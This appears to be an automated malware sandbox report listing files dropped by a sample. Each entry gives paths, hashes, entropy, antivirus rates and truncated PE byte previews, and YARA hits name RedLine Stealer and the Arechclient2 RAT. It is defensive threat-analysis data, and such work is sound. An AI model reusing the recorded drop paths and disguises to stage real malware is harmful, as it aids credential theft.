                                                                                                                                                                                                                            SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):410
                                                                                                                                                                                                                            Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Q3La/KDLI4MWuPTAq1KDLI4M0kvoDLI4MWuCv:ML9E4KH1qE4jE4Ks
                                                                                                                                                                                                                            MD5:812F0A8C671812AA613FC139B69E8614
                                                                                                                                                                                                                            SHA1:B4177437C50B25B06FB885362DA36FD171A1C5A9
                                                                                                                                                                                                                            SHA-256:6D3DF2C3EA20D3A411078200AFA62DAC6AABA4210C83A2186E80195977BF0F89
                                                                                                                                                                                                                            SHA-512:6A82C1F195C66FCC0533B20B8AE9B4F9CEBED6C8D7B450C574E864A60D627F3ABE32081BF65822157716F4672180E19C0DFA91D88663F7FC3CBE7FD0EB36B2EA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):545792
                                                                                                                                                                                                                            Entropy (8bit):6.384805269039956
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
                                                                                                                                                                                                                            MD5:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                                                                                            SHA1:D5927B38A32E30AFCF5A658612A8266476FC4AD8
                                                                                                                                                                                                                            SHA-256:64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
                                                                                                                                                                                                                            SHA-512:355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.0.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):545792
                                                                                                                                                                                                                            Entropy (8bit):6.384805269039956
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
                                                                                                                                                                                                                            MD5:6C93FC68E2F01C20FB81AF24470B790C
                                                                                                                                                                                                                            SHA1:D5927B38A32E30AFCF5A658612A8266476FC4AD8
                                                                                                                                                                                                                            SHA-256:64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
                                                                                                                                                                                                                            SHA-512:355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1514213
                                                                                                                                                                                                                            Entropy (8bit):7.748229600099168
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:vIUFcZ/0gD/COw3sTMWjtZEcTvC6k3Qt34RzKjw8/KhQ+NhglNedC0V8s41CbL4u:vNcigD/COPTXTWzWfKQ+ISdC0V8sqCZ
                                                                                                                                                                                                                            MD5:732823E6E94FE6E6E7D3143D4FE487B4
                                                                                                                                                                                                                            SHA1:4D5E8D5ADCA47EF14FF41FBD1A5FCE925C9F6A84
                                                                                                                                                                                                                            SHA-256:FEFB5176D51E5BD0641BFD7748FF1E54DE92890AF7711BBB62A5C608635029E4
                                                                                                                                                                                                                            SHA-512:D195AC8503DA70DBD7A538A15BF38DD262F16BBD12145673ACD34120FCD666602DE067AF77E71174F8A1D97E222EF2ED939BA749F9B3EEEA1DFDDADA255A7A83
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F..B...[..y..b..x..e..w...[..J..q..e..w...f..............................................._.....l..........................................................................................U..b...e..u......................................................................................._..D.....e..8..J..{..d.......................................................................8..&.............................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1514213
                                                                                                                                                                                                                            Entropy (8bit):7.7482315864317775
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:tIUFcZ/0gD/COw3sTMWjtZEcTvC6k3Qt34RzKjw8/KhQ+NhglNedC0V8s41CbL4u:tNcigD/COPTXTWzWfKQ+ISdC0V8sqCZ
                                                                                                                                                                                                                            MD5:62430F67FA4B5764B64DDBB617F426D8
                                                                                                                                                                                                                            SHA1:59CAEE4EBA4718D5B0BB22F800981A774C534279
                                                                                                                                                                                                                            SHA-256:D2AE1367E23FF8E70A97D8228C9328CF9945E53535F3D59B4FA8617503A77385
                                                                                                                                                                                                                            SHA-512:9975349D7D2981E4CD4CD50D458108E71A42CA8797555BFF96FC054B5C04BD98F355F2462A5A633C74777377A26DB0F165D59A4168F3C98ECA783BEE67A8B4D9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F..B...[..y..b..x..e..w...[..J..q..e..w...f..............................................._.....l..........................................................................................U..b...e..u......................................................................................._..D.....e..8..J..{..d.......................................................................8..&.............................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 20:09:08 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1063
                                                                                                                                                                                                                            Entropy (8bit):5.0060075797951376
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:859mC4ONYheRegKU/bSrL0yA/jfRs62P3qyFm:8CC4ONCeRPblRbryF
                                                                                                                                                                                                                            MD5:E9FD4FC6A0902FCB164983B4777BF454
                                                                                                                                                                                                                            SHA1:3278532C7747D3857D83FCB15AD97B1A8910ECDD
                                                                                                                                                                                                                            SHA-256:70681491ECAF15CAA26A8F8B9CBE5F9E383EBCD707F971356288250F8DD2E5B8
                                                                                                                                                                                                                            SHA-512:C2E6412B0C89342EA7D8CCCD3B81BFD46AE38E38B97FA56154F9D281135FD2884875FCD57E93D7D3E4B5AE023F859341208ECD508D677FB04159D5EEFAE43068
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:L..................F.... ....Z.!............Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v.............^..........t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.P.1......X....Local.<......CW.^.X......b.........................L.o.c.a.l.....N.1......X'...Temp..:......CW.^.X'.....l.........................T.e.m.p.....T.1......X%...u5ek.2..>......X#..X%.....U.....................k...u.5.e.k...2.....V.2.0.%..X./ .run.exe.@......X./.X%..............................r.u.n...e.x.e......._...............-.......^............/S......C:\Users\user\AppData\Local\Temp\u5ek.2\run.exe......\.u.5.e.k...2.\.r.u.n...e.x.e.........|....I.J.H..K..:...`.......X.......724536...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u5ek.3.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4741
                                                                                                                                                                                                                            Entropy (8bit):5.483464315579322
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:zKHeUuy3MQPvhbyslkbdbabbbDbnbzbjbQbAbGbOorQPirQPirQPirQPixPixPig:MFhgdw/Hb3naKMHQPUQPUQPUQPoPoPoO
                                                                                                                                                                                                                            MD5:346BD3191B538D1A799E1B5645779040
                                                                                                                                                                                                                            SHA1:30F26B8A27AB4F3C1E75BD9CB7AC44704FCD03FF
                                                                                                                                                                                                                            SHA-256:F68D5C79B0A8D99719F85B1F7FFE60616308D0A88C9A5CD2D6F4F6026B05FC47
                                                                                                                                                                                                                            SHA-512:45D0A27B6BCC1324051F57803A541FDAAFD08FCD74A0EA16E29EADD36E8A8E93F217D1344A4970D1AF1D855AA8CC80FD9F2B30181A6BFFCB63160C826F0244D9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:[04/26/24 23:09:12] Main : OS Version = osWin10...[04/26/24 23:09:12] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/26/24 23:09:12] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/26/24 23:09:13] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/26/24 23:09:13] DownloadAndLaunchInstaller : Creating BITS download handler...[04/26/24 23:09:13] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/26/24 23:09:22] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/26/24 23:09:22] DownloadAndLaunchInstaller : Target folder ="C:\User
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):786944
                                                                                                                                                                                                                            Entropy (8bit):6.809298494568767
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
                                                                                                                                                                                                                            MD5:5AEBA331CE853D10C82B56ADC96C9E80
                                                                                                                                                                                                                            SHA1:A208059F9591712ABF451114815B693AB14A5AB3
                                                                                                                                                                                                                            SHA-256:EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
                                                                                                                                                                                                                            SHA-512:5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, Author: Joe Security
                                                                                                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, Author: Joe Security
                                                                                                                                                                                                                            • Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\jwjqeqx, Author: ditekSHen
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}....*.0........... ....X..{M...*..0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):28672
                                                                                                                                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):312320
                                                                                                                                                                                                                            Entropy (8bit):6.527939405036737
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:5uv4t7jzTpsqDgLYiR+dH6kVtJ3hwg38hM8JKsNuGheh9OlsrxGMrp8nQJGESXF9:5lXgV9OpsM8JI2eaMr8QJGfXAK
                                                                                                                                                                                                                            MD5:ACAAA65D3F174EBF3595E23522837B43
                                                                                                                                                                                                                            SHA1:9A6F1CA6F103591E453B991BA0EC7FBA37863E63
                                                                                                                                                                                                                            SHA-256:8EA615668614745E60720FE0FBB6FEBF8CC9DFDD374F70AB7542132F86BF0EC2
                                                                                                                                                                                                                            SHA-512:5007C93E32211E7CE24089FAD1160720F0DC187CCD7F32BF2E3C0F66A080B7D6D5AFB8C62E367C2EE422F43763C07E065E1790054F3AFD0DD6B3A7F45C94D1F8
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L...&.>e.............................@.......0....@.................................]...........................................(....@...i......................L....2..8...............................@............0...............................text............................... ..`.rdata...m...0...n..................@..@.data...............................@....rsrc....i...@...j...D..............@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\wxfSIz4PAi.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3884863
                                                                                                                                                                                                                            Entropy (8bit):7.9982714074161665
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
                                                                                                                                                                                                                            MD5:78D3CA6355C93C72B494BB6A498BF639
                                                                                                                                                                                                                            SHA1:2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
                                                                                                                                                                                                                            SHA-256:A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
